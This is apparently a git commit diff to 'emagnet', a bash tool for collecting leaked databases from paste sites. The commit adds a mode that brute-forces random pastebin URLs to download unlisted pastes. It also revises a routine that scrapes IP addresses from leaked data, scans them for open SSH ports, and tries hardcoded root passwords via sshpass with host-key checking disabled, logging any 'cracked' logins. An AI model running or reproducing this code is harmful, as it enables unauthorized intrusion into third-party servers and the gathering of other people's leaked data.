added emagnet fuzzer

diff --git a/emagnet b/emagnet
--- a/emagnet
+++ b/emagnet
@@ -95,6 +95,7 @@ Usage: ./emagnet [--author] [--emagnet] [--option] .....
   -b, --backup        Create a compressed archive
   -d, --stats         Print stats from all folders
   -e, --emagnet       Download latest uploads and store leaked dbs
+  -f, --fuzzer        Create random urls and download unknown pastes
   -g, --bruteforce    Same as '-e' with brute-force mode on
   -i, --ip            Print you current WAN IPv4/IPv6
   -k, --kill          Kill emagnet sessions
@@ -386,8 +387,8 @@ if [[ $GBRUTEFORCE = "true" ]]; then
     printf "\n%64s \n" | tr ' ' '=';echo "";analyzer
 elif [[ $SBRUTEFORCE = "true" ]]; then
     clear;banner;printf "%20s \e[1mSSH\e[0m BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n";printf "\n%64s \n" | tr ' ' '=';echo "";analyzer
-else sed -i '121d' $CONF; sed -i '118 i GBRUTEFORCE=false' $CONF
-	 sed -i '121d' $CONF; sed -i '119 i SBRUTEFORCE=false' $CONF
+else sed -i '118d' $CONF; sed -i '118 i GBRUTEFORCE=false' $CONF
+	 sed -i '119d' $CONF; sed -i '119 i SBRUTEFORCE=false' $CONF
 	 source /etc/emagnet.conf;analyzer;fi
 }
 
@@ -482,14 +483,15 @@ printf "\n%64s \n\n" | tr ' ' '='
 }
 
 sshbruter() {
-if [[ $SSHPASS = "root" ]]; then
+if [[ -z $SSHPASS ]]; then
    echo -e "You must set a password to use during the attack"
    read -p "Enter a password or hit enter for default (Default: root) " sshpassb
      if [[ -n $sshpassb ]]; then
      sed -i '170d' $CONF
      sed -i "170 i SSHPASS=$sshpassb" $CONF
      else
-     sleep 0
+     sed -i '170d' $CONF
+     sed -i "170 i SSHPASS=root" $CONF
      fi
 fi
 
@@ -500,7 +502,10 @@ grep -Ewro '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' $EMAGNETHOME/.temp\
 |sort\
 |grep -v $SKIPLIST\
 |awk -F, '!seen[$1]++'> $SSHPORTSCAN
-
+if [[ $(cat /tmp/.emagnet-portscan|wc -l) -eq "0" ]]; then
+  printf "%17s[\e[1;31m\e[5m00\e[0m\e[0m] - Ipv4 Addresses foundn\n"
+  sleep 2
+else
     clear;banner;
     echo -e "                  PORTSCANNING - BRUTEFORCING"
     printf "\n%64s" | tr ' ' '='
@@ -508,16 +513,11 @@ grep -Ewro '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' $EMAGNETHOME/.temp\
     printf "Please use (CTRL+C) to abort the scan at anytime................\n"
     printf "%64s\n" | tr ' ' '='
     sleep 2
-    parallel -j32 -a /tmp/.emagnet-portscan '\
-timeout 0.5 nc -n -zv {} 22 > /dev/null 2>&1 |tee $SSHTARGETS 2>&1 grep open && \
-timeout 1 sshpass -p "root" ssh -v "-o StrictHostKeyChecking=no" wuseman@{} pwd 2>&1 grep "Authenticated to" &> /dev/null
-if [[ $? -eq "0" ]]; then
-echo -e "[\e[1;32m>>\e[0m] - Found password for: root@{}"
-else
-echo -e "[\e[\e[1;31m<<\e[0m] - Wrong password for: root@{}"
-fi
-#echo -e "[\e[1;32mopen..\e[0m] - {}:22" || \
-#echo -e "[\e[1;31mclosed\e[0m] - {}:22"' 
+parallel -j$THREADS -a /tmp/.emagnet-portscan '\
+timeout 0.5 nc -n -zv {} 22 > /dev/null 2>&1 |tee /tmp/.emagnet-sshbruter.txt 2>&1 grep open && \
+timeout 1 sshpass -p "odemnn" ssh -v "-o StrictHostKeyChecking=no" wuseman@{} pwd 2>&1 grep "Authenticated to" &> /dev/null
+
+
 if [[ $? -eq "0" ]]; then
     echo -e "[\e[1;32m>>\e[0m] - Found password: root@{}"
     echo -e "================================================================"     >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
@@ -527,7 +527,11 @@ if [[ $? -eq "0" ]]; then
     echo -e "[+] Password: $SSHPASS"                                               >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
     echo -e "================================================================\n\n" >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
 else
+    echo -e "[\e[1;31m<<\e[0m] - Wrong password: root@{}"
     echo -e "[\e[\e[1;31m<<\e[0m] - failed to crack $SSHUSER:$SSHPASS access on: {}:22" >> $EMAGNETLOGS/failed-2-crack.txt
+fi
+#echo -e "[\e[1;32mopen..\e[0m] - {}:22" || \
+#echo -e "[\e[1;31mclosed\e[0m] - {}:22"' 
 fi
     rm $SSHPORTSCAN $SSHTARGETS &> /dev/null
     sleep 2
@@ -890,6 +894,38 @@ else
       printf "emagnet: unknown error -- you forgot something, eh?\n"
        exit 1
 fi
+;;
+
+"f"|"-f"|"-fuzzer"|"--fuzzer")
+source /etc/emagnet.conf
+clear
+banner
+echo -e "                         FUZZER is: \e[1;32mON\e[0m\n"
+printf "%64s \n\n" | tr ' ' '='
+
+YUP="[\e[1;32m>>\e[0m]"
+NOPE="[\e[1;31m<<\e[0m]"
+
+#while getopts "f:" urls; do
+#   case "$urls" in
+#     "f") f=${OPTARG} ;;
+#     "fuzzer") f=${OPTARG} ;;
+#      "*") echo -e "emagnet: internal error -- usage: emagnet --fuzzer -f N"; exit ;;
+#   esac
+#done
+echo -e "[\e[1;33m>>\e[0m] - Generating \e[1m$2\e[0m urls."
+echo -e "[\e[1;33m>>\e[0m] - -------------------"
+for urls in $(seq 1 $2); do
+     fuz=https://pastebin.com/raw/$(tr -dc a-zA-Z0-9 < /dev/urandom | head -c 8)
+     fuzname="$(echo $fuz|cut -d/ -f5)"
+     echo -e "[\e[1;32m>>\e[0m] - Trying to download: $fuz"
+      echo $fuz|xargs -n 1000 -P 1000 -I{} wget -q https://pastebin.com/raw/$fuzname
+     if [[ $? -eq "0" ]]; then
+         echo $YUP - Downloaded $fuz;
+     else
+         echo -e "$NOPE - No luck this time for $fuzname.."
+     fi
+done
 ;;
 
 "help"|"-h"|"-help"|"--help") usage;exit 1 ;;
